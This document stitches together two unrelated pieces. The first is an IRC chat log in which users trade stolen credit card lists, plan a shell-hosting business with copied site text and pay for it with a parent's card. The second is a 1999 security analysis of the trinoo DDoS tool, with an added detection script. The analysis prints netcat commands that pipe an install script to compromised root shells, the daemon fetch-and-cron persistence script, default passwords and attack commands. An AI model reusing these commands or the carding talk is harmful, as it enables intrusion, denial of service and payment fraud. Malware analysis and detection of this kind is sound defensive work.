::) :connex! :i need a cc to buy a shell...anybody can help me? :connex! :i need a cc to buy a shell...anybody can help me? :_Mephisto! :where do you buy the shell??? :Bl4ck_! :www.turbulent.net :Bl4ck_! :www.turboshell.com :Bl4ck_! :www.shellyeah.org :Bl4ck_! :www.bestshell.com :_Mephisto! :thx :Bl4ck_! ::> :[sm0ke]! :is turbulent.net cardable? :m4r1n4ru! :nope :m4r1n4ru! :ajajajaaja :[sm0ke]! :hehe. i knew it. . :[sm0ke]! :u have to mail da freakin receipt. .. to have it activated. . :connex! :i need a cc to buy a shell...anybody can help me? :connex! :pls help me :_Mephisto! :bye :connex! :i need a cc to buy a shell...anybody can help me? :connex! :pls help me :[sm0ke]! :buy a shell? where? :connex! :[sm0ke] help me :connex! :[sm0ke] help me i want to buy a shell :TheRason! :hello anybody :TheRason! :i need a cc to buy a web domain :[sm0ke]! : :card-it! :trading lists, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :no traders in here? :Bl4ck_! :ACTION is away -[ Starcraft si astea si alea @ Starcraft and this and that ]- at 06:26a -[ P:On / L:On ]- :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :card-it! :trading lists and merchants, /msg me.... :|Makaveli! :how can we get the +v??? :|Makaveli! :or an op :gatorade^! :ACTION is trading ccz msg me :J4n3! :D1ck ? :D1ck! :yep :D1ck! :y0 :D1ck! :i am from my dad's laptiop :D1ck! :sun :D1ck! :i need a webpage :D1ck! :for the box :J4n3! :webpage ? :D1ck! :deal finialised :D1ck! :and u know how can i accept credit card online? :J4n3! :yeah u can but fruad bauth hoga, but @ yeah you can, but there will be a lot of fraud, but :D1ck! :? :J4n3! :if u set the rule that fax or email the scanned copy of credit card phir sahi hai @ if you set the rule that they fax or email a scanned copy of the credit card, then it's fine :D1ck! :we have to pay for fraud or its their responsibility/ :D1ck! :oh :D1ck! :kool :J4n3! :yeah :) :D1ck! ::) :D1ck! :can u start the page :D1ck! :? :J4n3! :server ka kyia huwa ? @ what happened with the server? :J4n3!
:webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices @ the webpage will get made right away, I have the material from j0e's site, just need the prices :J4n3! :what's the compnay name ? i mean site name ? :J4n3! :? :D1ck! :got d/c :J4n3! :wb :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices @ the webpage will get made right away, I have the material from j0e's site, just need the prices :D1ck! :thx :J4n3! :what's the compnay name ? i mean site name ? :D1ck! :company's name is 'Big Stuff' :D1ck! :or u have any beter name? :D1ck! :i want a site some thing like www.unixrules.net :D1ck! :i`ll tell u the prices :J4n3! :hmm :J4n3! :unixrules is booked i think :D1ck! :no no :D1ck! :i am ssaying :D1ck! :look at their page :D1ck! :it rox :J4n3! :oh u mean designing ? :D1ck! :yeps :D1ck! :hehe :D1ck! :'Big Stuff' :D1ck! :The Ultimate Web Solution. :J4n3! :hmm :D1ck! :till when will be the website complete? :J4n3! :wait lemme take a look :D1ck! :oki :J4n3! :hmm yeah saw it :D1ck! :kewl :D1ck! :what prices should we do? :J4n3! :no idea i think it should start from 9 to 10 $ for shell :J4n3! :3 to 4 for bnc :D1ck! :oki :J4n3! :webhosting i'll ask j0e :D1ck! :okies :J4n3! :oye what bout server ?? :D1ck! : 4 background processes (eggdrop, screen, irc) :J4n3! :got this box its fast 24.66.83.137.mb.wave.home.com :D1ck! : 2 login names :D1ck! : 20 MB total disk space :D1ck! : FTP, and SSH access :D1ck! : 2 POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : 3 months [$30] - 6 months [$60] - 12 months [$120] :D1ck! : Credit Card Customers, Sign up here :D1ck! : Sign up Now :J4n3! :but no linux root kit :( :D1ck! :server? :D1ck! :heheh :J4n3! :i mean have u finalized? :D1ck! :my computer is not working :D1ck! :thats why i am in this :D1ck! :yep :J4n3! :oh :D1ck! :finisalised :J4n3! :going to pay for it ? :D1ck! :yep :J4n3! :anuallay ?? how much ? :D1ck! :welp :D1ck! :200/month :D1ck! :and rent is 25 :D1ck! :225 :J4n3! :oh kewl :J4n3! :ip's ? :J4n3! :how much ip's ? :D1ck! :256 :D1ck! ::") :J4n3! :great :) :D1ck! :hehe :D1ck!
:wait i`ll send u .txt for shells :D1ck! :one sec :J4n3! :k :J4n3! ::) :D1ck! ::) :J4n3! :Caldera OpenLinux(TM) :J4n3! :Version 2.2 :J4n3! :Copyright 1996-1999 Caldera Systems, Inc. :D1ck! :oye accept this :J4n3! :send send :J4n3! :bin/login: error in loading shared libraries: libcrypt.so.1: cannot open shared object file: No such file or directory :D1ck! :make it attractive and stuff :J4n3! : DCC Unable to create connection: Connection refused :D1ck! :err :D1ck! :copy paste this :D1ck! :SPECIAL PACKAGE :D1ck! : :D1ck! : 4 background processes (eggdrop, screen, irc, energymechs) :D1ck! : 25 MB total disk space :D1ck! : FTP, and SSH access :D1ck! : 2 POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : :D1ck! : 1 month [$20] 3 months [$40] - 6 months [$60] - 12 months [$120] :D1ck! :SILVER SHELL ACCOUNT :D1ck! : 2 background processes (eggdrop, screen, irc, energymechs) :D1ck! : 10MB total disk space :D1ck! : FTP, and SSH access :D1ck! : POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : 1 month [$10] 3 months [$30] - 6 months [$55] - 12 months [$100] :D1ck! : :D1ck! :GOLD SHELL :D1ck! : 4 background processes (eggdrop, screen, irc, energymechs) :D1ck! : 2 login names :D1ck! : FREE Personal vhost (username@can.choose.from.many.domains) :D1ck! : 100 MB total disk space :D1ck! : FTP and SSH access :D1ck! : 2 POP3 Email addresses (username@celebreum.net) :D1ck! : Access to hundreds of VHOSTS :D1ck! : 3 months [$60] - 6 months [$110] - 12 months [$200] :D1ck! :make the rupeese too pls :D1ck! ::P :J4n3! :hah u forgot to write the BitchX ? :D1ck! :oh yes :D1ck! :irc==BitchX :J4n3! :eggdrop, screen, irc, energymechs, BitchX :D1ck! :yep yep :D1ck! :add it :D1ck! ::P :J4n3! :ok :J4n3! :kkz wait lemme copy it :D1ck! :oye thats stolen from unixrules :D1ck! :so change it a bit :D1ck! :jhehe :D1ck! :hehe :J4n3! :ok done :) :J4n3! :yeah don worry prices r same ? :J4n3! :or u modified it ? :D1ck! 
:modified :D1ck! :and mb space too :J4n3! :kkz :J4n3! :Celebrium ? :D1ck! :yep :D1ck! :ok now webpage :D1ck! :BASIC WEBHOSTING :D1ck! : 100MB disk space :D1ck! : 1 Mailbox (POP3/SMTP) :D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space :D1ck! : 500 MB of data transfer per month :D1ck! : 3 months [$30] - 6 months [$55] - 12 months [$100] :D1ck! :PRIME WEBHOSTING :D1ck! : 200 MB disk space :D1ck! : 5 Mailboxes (POP3/SMTP) :D1ck! : FREE Domain Name Registration (internic fee applies) :D1ck! : Unlimited email address forwarding :D1ck! : Custom CGI script directory :D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space :D1ck! : 1500 MB of data transfer per month :D1ck! : 3 months [$60] - 6 months [$110] - 12 months [$200] :D1ck! :PRO WEBHOSTING :D1ck! : 350 MB disk space :D1ck! : 25 Mailboxes (POP3/SMTP) :D1ck! : Unlimited email address forwarding :D1ck! : Custom CGI script directory :D1ck! : PHP3 access :D1ck! : Frontpage Extension access :D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space :D1ck! : 5000 MB of data transfer per month :D1ck! : 3 months [$150] - 6 months [$275] - 12 months [$500] :D1ck! :modify style and idhar udhar so it doesnt look as we stole it @ modify the style and bits here and there so it doesn't look like we stole it :D1ck! :hehe :J4n3! :hah is say kuch nahi hotha waisy bee almost sub shells kay milthay julthay hain @ hah, nothing will come of that, anyway almost all the shell providers' pages look alike :D1ck! :EMAIL HOSTING :D1ck! : FREE Domain Name Registration (Internic Fee applies) :D1ck! : username@your-company.com :D1ck! : 5 Mailboxes (POP3) :D1ck! : 25 Emails Forwarding :D1ck! : 3 months [$30] - 6 months [$50] - 12 months [$75] :D1ck! :lol :D1ck! :yup :D1ck! ::P :D1ck! :oye when will it be complete :D1ck! :asnd i am signing up legal domain :D1ck! :where should i? :D1ck! :cheapest :D1ck! :? :J4n3! :hmmm :D1ck! :mater may we are OC3 :P :J4n3! :dotster.com :D1ck! :OC3 lines :D1ck! :ok :J4n3! :yeah from where u getting this server ? and till when u get it ? :J4n3! :it should be on redhat ok ? :D1ck!
:easilyhosted :D1ck! :yep :D1ck! :it is :D1ck! :i`ll make it ultra secure :D1ck! :redhat 6.2 :J4n3! :haha kewl :D1ck! :i`ll upgrade to new kernel :J4n3! :give me 2 days for web :D1ck! :2.2.16 :D1ck! :kewl :D1ck! :okies :J4n3! ::) :D1ck! :the day u do it :D1ck! :the next day ill get the seerver :D1ck! :online :J4n3! :hmmm :J4n3! :talked to ur dad bout it ? :D1ck! :ofcourse :D1ck! :he sed 'yes' :D1ck! :and i have his cc in my hand :D1ck! ::P :J4n3! :haha cool :J4n3! :woooo :J4n3! ::p :D1ck! ::/ :J4n3! :lekin signup kahan say kiya ?? konsee company say ? @ but where did you sign up? with which company? :J4n3! :t3 ? :J4n3! :or oc3 ? :D1ck! :well :D1ck! :more then Tota1KaaS1 :D1ck! :t1 :D1ck! :but :D1ck! :technically OC3 :D1ck! :ll providers who sya they are oc3 are lieing, yes technicqally they :D1ck! :are :J4n3! :ahaan @ I see :D1ck! :but its shared bandwith :D1ck! :mine will be 990k/sec :J4n3! :w00ps :D1ck! :to 2 mb :D1ck! :and 40 gigs of transfer :J4n3! :shells will rock on this server :D1ck! :yep :D1ck! ::) :D1ck! :and i`ve heard routers are firewalled :D1ck! :so thats a good enws :J4n3! :great already signed up , or going to ? :D1ck! :oye pls get started on the page if u are not too bz :D1ck! ::P :D1ck! :i will send the payment :J4n3! :yeah i will from today :D1ck! :no cc :D1ck! :and today i`ll buy a merchant account :J4n3! :oh ohkay :) :D1ck! ::) :J4n3! :u have too many ips :D1ck! :yep :J4n3! :we can buy more domains illlegaly to like j0e but :D1ck! :that rox :D1ck! :well :D1ck! :i can get caught :J4n3! :first we need the dns of ur server so we can give it when registering the domain :D1ck! ::p :J4n3! :like ns1 and ns2 :J4n3! :they need it for registeration :D1ck! :oh :D1ck! :i am half way through the registration :D1ck! :hehe :D1ck! :so i cant modify it later? :J4n3! :yeah :) :D1ck! :kewl :D1ck! :almost complete :J4n3! ::)))))) :D1ck! :hehe :D1ck! :a graphix of Big Tecnologies would rock :J4n3! :sure it would , just see :D1ck! ::/ :D1ck! :oki :J4n3! ::9:0:) :D1ck! ::) :J4n3! :how do i open a telnet on a box ??
from inetd.conf ? when it say connection refused on 23 , its not on hosts.allow :D1ck! :err they need name serfver :D1ck! :hehe :D1ck! :cat /etc/inetd.conf | grep telnet :D1ck! :and paste me here :J4n3! :yeah wait :J4n3! :hahah yeah :J4n3! :its close from there :J4n3! :the box is kewl i want to run psy from there :J4n3! :ip is admin.cgocable.net :J4n3! :wait lemme opne it :D1ck! :hehhe

Day 14 June 17

307.0 [IND] Trinoo DDoS Analysis
~~~~~~~~~~~~~~~~~~~~~~~~~~~

==========================================================================
The DoS Project's "trinoo" distributed denial of service attack tool
==========================================================================

David Dittrich
University of Washington
Copyright 1999. All rights reserved.
October 21, 1999

Introduction
------------

The following is an analysis of the DoS Project's "trinoo" (a.k.a. "trin00") master/slave programs, which implement a distributed network denial of service tool.

Trinoo daemons were originally found in binary form on a number of Solaris 2.x systems, which were identified as having been compromised by exploitation of buffer overrun bugs in the RPC services "statd", "cmsd" and "ttdbserverd". These attacks are described in CERT Incident Note 99-04:

    http://www.cert.org/incident_notes/IN-99-04.html

The trinoo daemons were originally believed to be UDP based, access-restricted remote command shells, possibly used in conjunction with sniffers to automate recovering sniffer logs.

During investigation of these intrusions, the installation of a trinoo network was caught in the act and the trinoo source code was obtained from the account used to cache the intruders' tools and log files. This analysis was done using this recovered source code. Modification of the source code would change any of the details in this analysis, such as prompts, passwords, commands, TCP/UDP port numbers, or supported attack methods, signatures, and features.
The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0 systems. The master was compiled and run on Red Hat Linux 6.0. It is believed that both master and daemon have been witnessed "in the wild" on these same platforms.

Trinoo networks are probably being set up on hundreds, perhaps thousands, of systems on the Internet that are being compromised by remote buffer overrun exploitation. Access to these systems is probably being perpetuated by the installation of multiple "back doors" along with the trinoo daemons.

A trinoo network of at least 227 systems -- 114 of these at Internet2 sites -- was used on August 17, 1999 to flood a single system at the University of Minnesota, swamping the target network and rendering it unusable for over two days. While responding to this attack, large flows were also noticed going to at least sixteen other systems, some outside the US. (See Appendix D for a report of part of this trinoo attack.)

Attack scenario
---------------

A typical installation might go something like this.

1). A stolen account is set up as a repository for pre-compiled versions of scanning tools, attack (i.e. buffer overrun exploit) tools, root kits and sniffers, trinoo daemon and master programs, lists of vulnerable hosts and previously compromised hosts, etc. This would normally be a large system with many users, one with little administrative oversight, and on a high-bandwidth connection for rapid file transfer.

2). A scan is performed of large ranges of network blocks to identify potential targets. Targets would include systems running various services known to have remotely exploitable buffer overflow security bugs, such as wu-ftpd, RPC services for "cmsd", "statd", "ttdbserverd", "amd", etc.
Operating systems being targeted appear to be primarily Sun Solaris 2.x and Linux (due to the ready availability of network sniffers and "root kits" for concealing back doors, etc.), but stolen accounts on any architecture can be used for caching tools and log files.

3). A list of vulnerable systems is then used to create a script that performs the exploit, sets up a command shell running under the root account that listens on a TCP port (commonly 1524/tcp, the "ingreslock" service port), and connects to this port to confirm the success of the exploit. In some cases, an electronic mail message is sent to an account at a free web based email service to confirm which systems have been compromised. The result is a list of "owned" systems ready for setting up back doors, sniffers, or the trinoo daemons or masters.

4). From this list of compromised systems, subsets with the desired architecture are chosen for the trinoo network. Pre-compiled binaries of the trinoo daemon are created and stored on a stolen account somewhere on the Internet.

5). A script is then run which takes this list of "owned" systems and produces yet another script to automate the installation process, running each installation in the background for maximum multitasking. This script uses "netcat" ("nc") to pipe a shell script to the root shell listening on, in this case, port 1524/tcp:

---------------------------------------------------------------------------
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
. . .
---------------------------------------------------------------------------

The script "trin.sh", whose output is being piped to these systems, looks like:

---------------------------------------------------------------------------
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
---------------------------------------------------------------------------

Depending on how closely crontab files are monitored, or if they are used at all, this may be detected easily. If cron is not used at all by this user (usually root), it may not be detected at all.

Another method was witnessed on at least one other system, where the daemon was named "xterm", and was started using a script (named "c" on the system on which it was found) that contains:

---------------------------------------------------------------------------
cd /var/adm/.1
PATH=.:$PATH
export PATH
xterm 1>/dev/null 2>&1
---------------------------------------------------------------------------

This would supposedly imply a method of running this script on demand to set up the trinoo network. Even more subtle ways of having trinoo daemons/masters lie in wait for execution at a given time are easy to envision (e.g., UDP or ICMP based client/server shells, such as LOKI (see Appendix C), programs that wake up periodically and open a listening TCP or UDP port, etc.)

The result of this automation is the ability for attackers to set up the denial of service network, on widely dispersed systems whose true owners don't even know are out of their control, in a very short time frame.

6). Optionally, a "root kit" is installed on the system to hide the presence of programs, files, and network connections.
This is more important on the master system, since these systems are key to the trinoo network. (It should be noted that in many cases, masters have been set up on Internet Service Providers' primary name server hosts, which would normally have extremely high packet traffic and large numbers of TCP and UDP connections, which would effectively hide any trinoo related traffic or activity, and would likely not be detected. The fact that these are primary name servers would also tend to make the owners less likely to take the system off the Internet when reports begin to come in about suspected denial of service related activity.)

Root kits would also be used on systems running sniffers that, along with programs like "hunt" (a TCP/IP session hijacking tool), are used to burrow further into other networks directly, rather than through remote buffer overrun exploits (e.g., to find sites to set up new file repositories, etc.)

For more on "root kits" and some ways to get around them, see:

    http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq

The network: attacker(s)-->master(s)-->daemon(s)-->victim(s)
------------------------------------------------------------

The trinoo network is made up of a master server ("master.c") and the trinoo daemon ("ns.c"). A trinoo network would look like this:

               +----------+           +----------+
               | attacker |           | attacker |
               +----------+           +----------+
                    |                      |
  . . .  --+------+---------------+------+----------------+--  . . .
           |      |               |      |                |
           |      |               |      |                |
      +----------+          +----------+          +----------+
      |  master  |          |  master  |          |  master  |
      +----------+          +----------+          +----------+
        |     |               |     |               |     |
        |     |               |     |               |     |
  . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
           |      |     |            |   |        |            | |
           |      |     |            |   |        |            | |
      +--------+ +--------+ +--------+ +--------+ +--------+
      | daemon | | daemon | | daemon | | daemon | | daemon |
      +--------+ +--------+ +--------+ +--------+ +--------+

The attacker(s) control one or more "master" servers, each of which can control many "daemons" (known in the code as "Bcast", or "broadcast" hosts.)
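The installation steps above leave a few host-side artifacts a responder can look for: the root shell the exploit script left listening on 1524/tcp, the crontab entry that re-launches /usr/sbin/rpc.listen every minute, and the hidden /var/adm/.1 directory holding a daemon renamed "xterm". The following triage script is an added example, not part of Dittrich's analysis or of trinoo; it runs those checks over constructed sample data (a root crontab, Linux-style "netstat -an" output and a short file list). The file names it looks for are the ones seen in this analysis and, as the text warns, change whenever the source is modified, so the every-minute cron rule and the ingreslock listener are the more durable tells.

```python
import re
from typing import List, Tuple

Finding = Tuple[str, str]

# Artifact names taken from the installation scripts quoted in the analysis.
# A rebuilt trinoo can use any name, so treat these as a starting point.
INGRESLOCK_PORT = 1524              # root shell left behind by the exploit script
KNOWN_DAEMON_NAMES = {"rpc.listen"}  # the name trin.sh gives the daemon
X11_BIN_DIRS = ("/usr/bin/X11/", "/usr/X11R6/bin/", "/usr/openwin/bin/")  # where a real xterm lives


def check_crontab(crontab: str) -> List[Finding]:
    """Flag every-minute jobs (the trin.sh persistence) and jobs run from hidden directories."""
    findings = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue                      # not a five-field schedule plus command
        schedule, command = fields[:5], fields[5]
        if schedule == ["*"] * 5:
            findings.append(("cron-every-minute", command))
        if re.search(r"/\.[^/]+/", command):
            findings.append(("cron-hidden-dir", command))
    return findings


def check_listeners(netstat: str) -> List[Finding]:
    """Flag a TCP listener on the ingreslock port in Linux-style 'netstat -an' output."""
    findings = []
    for line in netstat.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != "tcp":
            continue
        local = parts[3]
        port = int(local.rsplit(":", 1)[1])
        if parts[-1] == "LISTEN" and port == INGRESLOCK_PORT:
            findings.append(("ingreslock-listener", local))
    return findings


def check_paths(paths: List[str]) -> List[Finding]:
    """Flag hidden entries under /var/adm and the binary names the install scripts use."""
    findings = []
    for path in paths:
        name = path.rpartition("/")[2]
        if path.startswith("/var/adm/") and re.search(r"/\.[^/]+(/|$)", path):
            findings.append(("hidden-under-var-adm", path))
        if name in KNOWN_DAEMON_NAMES:
            findings.append(("known-daemon-name", path))
        if name == "xterm" and not path.startswith(X11_BIN_DIRS):
            findings.append(("xterm-outside-x11", path))
    return findings


def triage(crontab: str, netstat: str, paths: List[str]) -> List[Finding]:
    """Run all three checks and return (kind, detail) pairs."""
    return check_crontab(crontab) + check_listeners(netstat) + check_paths(paths)


# Constructed sample inputs (not captures from the page): root's crontab after
# trin.sh ran, 'netstat -an' with the exploit's root shell still listening, and a
# handful of paths as a find(1) run would list them.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/lib/newsyslog
* * * * * /usr/sbin/rpc.listen
"""
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:40112          ESTABLISHED
"""
SAMPLE_PATHS = [
    "/usr/sbin/rpc.listen",
    "/var/adm/.1/xterm",
    "/var/adm/.1/c",
    "/usr/bin/X11/xterm",
    "/var/adm/messages",
]

if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_CRONTAB, SAMPLE_NETSTAT, SAMPLE_PATHS):
        print(f"{kind:22s} {detail}")
```

On a live box the inputs would come from "crontab -l" as root, "netstat -an" and a find over /var/adm; remember that a root kit installed in step 6 can hide all three from the system's own tools, so compare against output taken from a clean binary set or a mounted image.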
The daemons are all instructed to coordinate a packet based attack against one or more victim systems. All that is then needed is the ability to establish a TCP connection to the master hosts using "telnet" and the password to the master server to be able to wage massive, coordinated, denial of service attacks.

Communication ports
-------------------

    Attacker to Master(s):  27665/tcp
    Master to daemon(s):    27444/udp
    Daemon to Master(s):    31335/udp

Remote control of the trinoo master is accomplished via a TCP connection to port 27665/tcp. After connecting, the user must give the proper password ("betaalmostdone"). If another connection is made to the server while someone is already authenticated, a warning is sent to them with the IP address of the connecting host (it appears there is a bug that reports incorrect IP addresses, but a warning is still communicated). This will no doubt be fixed eventually and will then give the attackers time to clean up and cover their tracks.

Communication from the trinoo master to daemons is via UDP packets on port 27444/udp. Command lines are space separated lines of the form:

    arg1 password arg2

The default password for commands is "l44adsl", and only command lines that contain the substring "l44" are processed.

Communication from the trinoo daemons and the master is via UDP packets on port 31335/udp. When the daemon starts, it initially sends "*HELLO*" to the master, which maintains a list of active daemons that it controls (packet captured using "sniffit"):

    UDP Packet ID (from_IP.port-to_IP.port):
      192.168.0.1.32876-10.0.0.1.31335
       45 E  00 .  00 .  23 #  B1 .  5D ]  40 @  00 .  F8 .  11 .  B9 .  27 .
       C0 .  A8 .  00 .  01 .  0A .  00 .  00 .  01 .  80 .  6C l  7A z  67 g
       00 .  0F .  06 .  D4 .  2A *  48 H  45 E  4C L  4C L  4F O  2A *

If the trinoo master sends a "png" command to a daemon on port 27444/udp, the daemon will reply to the server that just sent the "png" command by sending the string "PONG" on port 31335/udp:

    UDP Packet ID (from_IP.port-to_IP.port):
      10.0.0.1.1024-192.168.0.1.27444
       45 E  00 .  00 .  27 '  1A .  AE .  00 .  00 .  40 @  11 .  47 G  D4 .
       0A .  00 .  00 .  01 .  C0 .  A8 .  00 .  01 .  04 .  00 .  6B k  34 4
       00 .  13 .  2F /  B7 .  70 p  6E n  67 g  20    6C l  34 4  34 4  61 a
       64 d  73 s  6C l

    UDP Packet ID (from_IP.port-to_IP.port):
      192.168.0.1.32879-10.0.0.1.31335
       45 E  00 .  00 .  20    13 .  81 .  40 @  00 .  F8 .  11 .  57 W  07 .
       C0 .  A8 .  00 .  01 .  0A .  00 .  00 .  01 .  80 .  6F o  7A z  67 g
       00 .  0C .  4E N  24 $  50 P  4F O  4E N  47 G

Password protection
-------------------

Both the master and daemons are password protected to prevent system administrators (or other hacker groups) from being able to take control of the trinoo network. These passwords are crypt() style passwords. They are used in a symmetric fashion, where the encrypted password is compiled into the master and daemons and used to compare against the clear-text version of the password that is sent over the network (the current version does not encrypt the actual session, so the clear-text passwords are exposed in transit and the master control sessions are subject to TCP session hijacking).

When initially run, the master daemon produces a prompt, waiting for a password. If the proper password is not received, the program exits. If the proper password is given, the process announces its execution, forks to continue running in the background, and exits:

    # ./master
    ?? wrongpassword
    #
    . . .
    # ./master
    ?? gOrave
    trinoo v1.07d2+f3+c [Sep 26 1999:10:09:24]
    #

Likewise, when you connect to the remote command port (default 27665/tcp), you must also give a password:

    attacker$ telnet 10.0.0.1 27665
    Trying 10.0.0.1
    Connected to 10.0.0.1
    Escape character is '^]'.
    kwijibo
    Connection closed by foreign host.
    . . .
    attacker$ telnet 10.0.0.1 27665
    Trying 10.0.0.1
    Connected to 10.0.0.1
    Escape character is '^]'.
    betaalmostdone
    trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

    trinoo>

Certain commands sent to the trinoo daemons by the master are also password protected. This password is sent in clear text between the master and daemons. The default passwords were:

    "l44adsl"         trinoo daemon password
    "gOrave"          trinoo master server startup ("?? " prompt)
    "betaalmostdone"  trinoo master remote interface password
    "killme"          trinoo master password to control "mdie" command

Master commands
---------------

The trinoo master supports the following commands:

    die             Shut down the master.

    quit            Log off the master.

    mtimer N        Set DoS timer to N seconds. N can be between 1 and
                    1999 seconds. If N is < 1, it defaults to 300. If N
                    is > 2000, it defaults to 500.

    dos IP          DoS the IP address specified. A command
                    ("aaa l44adsl IP") is sent to each Bcast host (i.e.,
                    trinoo daemons) telling them to DoS the specified IP
                    address.

    mdie pass       Disable all Bcast hosts, if the correct password is
                    specified. A command is sent ("d1e l44adsl") to each
                    Bcast host telling them to shut down. A separate
                    password is required for this command.

    mping           Send a PING command ("png l44adsl") to every active
                    Bcast host.

    mdos            Multiple DoS. Sends a multiple DoS command
                    ("xyz l44adsl 123:ip1:ip2:ip3") to each Bcast host.

    info            Print version and compile information, e.g.:

                      This is the "trinoo" AKA DoS Project master server version v1.07d2+f3+c
                      Compiled 15:08:41 Aug 16 1999

    msize           Set the buffer size for packets sent during DoS
                    attacks.

    nslookup host   Do a name service lookup of the specified host from
                    the perspective of the host on which the master
                    server is running.

    killdead        Attempts to weed out all dead Bcast hosts by first
                    sending all known Bcast hosts a command
                    ("shi l44adsl") that causes any active daemons to
                    reply with the initial "*HELLO*" string, then
                    renames the Bcast file (with extension "-b") so it
                    will be re-initialized when the "*HELLO*" packets
                    are received.

    usebackup       Switch to the backup Bcast file created by the
                    "killdead" command.

    bcast           List all active Bcast hosts.

    help [cmd]      Give a (partial) list of commands, or a brief
                    description of the command "cmd" if specified.

    mstop           Attempts to stop a DoS attack (not implemented, but
                    listed in the help command).

Daemon commands
---------------

The trinoo daemon supports the following commands:

    aaa pass IP     DoS the specified IP address. Sends UDP packets to
                    random (0-65534) UDP ports on the specified IP
                    addresses for a period of time (default is 120
                    seconds, or 1 - 1999 seconds as set by the "bbb"
                    command.) The size of the packets is that set by the
                    "rsz" command, or the default size of 1000 bytes.

    bbb pass N      Sets time limit (in seconds) for DoS attacks.

    shi pass        Sends the string "*HELLO*" to the list of master
                    servers compiled into the program on port 31335/udp.

    png pass        Sends the string "PONG" to the master that issued
                    the command on port 31335/udp.

    d1e pass        Shut down the trinoo daemon.

    rsz N           Set size of buffer for DoS attacks to N bytes. (The
                    trinoo daemon simply malloc()s a buffer with this
                    size, then sends the uninitialized contents of the
                    buffer during an attack.)

    xyz pass 123:ip1:ip2:ip3
                    Multiple DoS. Does the same thing as the "aaa"
                    command, but for multiple IP addresses.

It could be coincidence, but I will give the author some credit and assume that three letter commands were chosen so they don't show up in the binary as visible strings under the default behavior of STRINGS(1). You must use the "--bytes=3" option of GNU STRINGS(1) to see the commands:

    # strings --bytes=3 ns | tail -15
    socket
    bind
    recvfrom
    l44
    %s %s %s
    aIf3YWfOhw.V.
    aaa
    bbb
    shi
    png
    PONG
    d1e
    rsz
    xyz
    *HELLO*

Fingerprints
------------

The method used to install the trinoo daemon on some systems employs a crontab entry to start the daemon every minute. Examining crontab files would locate this entry:

    * * * * * /usr/sbin/rpc.listen

The master program creates a file (default name "...") containing the set of Bcast hosts. If the command "killdead" is used, an "shi" command is sent to all daemons listed in "...", which causes them to send the initial "*HELLO*" string to all masters. The current list is renamed (default "...-b") and a new list is then generated as each remaining live daemon sends its "*HELLO*".

The source code ("master.c") contains the following lines:

------------------------------------------------------------------------------
    . . .
    /* crypt key encrypted with the key 'bored'(so hex edit cannot get key easily?)
       comment out for no encryption... */
    #define CRYPTKEY "ZsoTN.cq4X31"
    . . .
------------------------------------------------------------------------------

If the program was compiled with CRYPTKEY defined, the IP addresses of Bcast hosts are encrypted using the Blowfish encryption algorithm:

    # ls -l ... ...-b
    -rw-------   1 root     root           25 Sep 26 14:46 ...
    -rw-------   1 root     root           50 Sep 26 14:30 ...-b
    # cat ...
    JPbUc05Swk/0gMvui18BrFH/
    # cat ...-b
    aE5sK0PIFws0Y0EhH02fLVK.
    JPbUc05Swk/0gMvui18BrFH/

Assuming there is no "root kit" present to hide processes, the master server shows the following network socket fingerprints (of course, the names and directory locations of either program are subject to change):

------------------------------------------------------------------------------
    # netstat -a --inet
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State
    tcp        0      0 *:27665                 *:*                     LISTEN
    . . .
    udp        0      0 *:31335                 *:*
    . . .

    # lsof | egrep ":31335|:27665"
    master    1292     root    3u  inet    2460       UDP *:31335
    master    1292     root    4u  inet    2461       TCP *:27665 (LISTEN)

    # lsof -p 1292
    COMMAND  PID USER   FD   TYPE DEVICE    SIZE  NODE NAME
    master  1292 root  cwd    DIR    3,1    1024 14356 /tmp/...
    master  1292 root  rtd    DIR    3,1    1024     2 /
    master  1292 root  txt    REG    3,1   30492 14357 /tmp/.../master
    master  1292 root  mem    REG    3,1  342206 28976 /lib/ld-2.1.1.so
    master  1292 root  mem    REG    3,1   63878 29116 /lib/libcrypt-2.1.1.so
    master  1292 root  mem    REG    3,1 4016683 29115 /lib/libc-2.1.1.so
    master  1292 root    0u   CHR    4,1          2967 /dev/tty1
    master  1292 root    1u   CHR    4,1          2967 /dev/tty1
    master  1292 root    2u   CHR    4,1          2967 /dev/tty1
